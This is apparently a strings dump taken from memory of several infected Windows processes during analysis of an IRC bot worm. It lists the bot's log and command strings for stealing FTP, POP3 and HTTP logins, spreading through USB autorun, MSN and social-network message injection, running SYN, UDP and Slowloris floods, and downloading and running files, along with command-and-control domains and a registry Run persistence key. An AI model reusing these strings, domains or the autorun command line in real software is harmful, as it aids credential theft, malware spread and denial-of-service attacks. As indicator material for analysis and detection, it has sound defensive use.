[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
\??\%System%\csrss.exe
\??\%System%\csrss.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\csrss.exe
\Device\HarddiskVolume1\WINDOWS\system32\csrss.exe
c:\%original file name%.exe
c:\%original file name%.exe
winlogon.exe_712_rwx_015F0000_0004E000:
services.exe_756_rwx_00B60000_0004E000:
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\services.exe
%System%\services.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\services.exe
\Device\HarddiskVolume1\WINDOWS\system32\services.exe
c:\%original file name%.exe
c:\%original file name%.exe
Explorer.EXE_888_rwx_01E60000_0004E000:
svchost.exe_936_rwx_00EA0000_0004E000:
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\svchost.exe
%System%\svchost.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
svchost.exe_1020_rwx_00B00000_0004E000:
svchost.exe_1104_rwx_033C0000_0004E000:
svchost.exe_1164_rwx_00870000_0004E000:
svchost.exe_1244_rwx_00C80000_0004E000:
wmiprvse.exe_1352_rwx_00DE0000_0004E000:
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\wbem\wmiprvse.exe
%System%\wbem\wmiprvse.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
c:\%original file name%.exe
c:\%original file name%.exe
spoolsv.exe_1436_rwx_00FA0000_0004E000:
jqs.exe_1592_rwx_010B0000_0004E000:
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%Program Files%\Java\jre6\bin\jqs.exe
%Program Files%\Java\jre6\bin\jqs.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe
\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe
c:\%original file name%.exe
c:\%original file name%.exe
wuauclt.exe_1792_rwx_02700000_0004E000: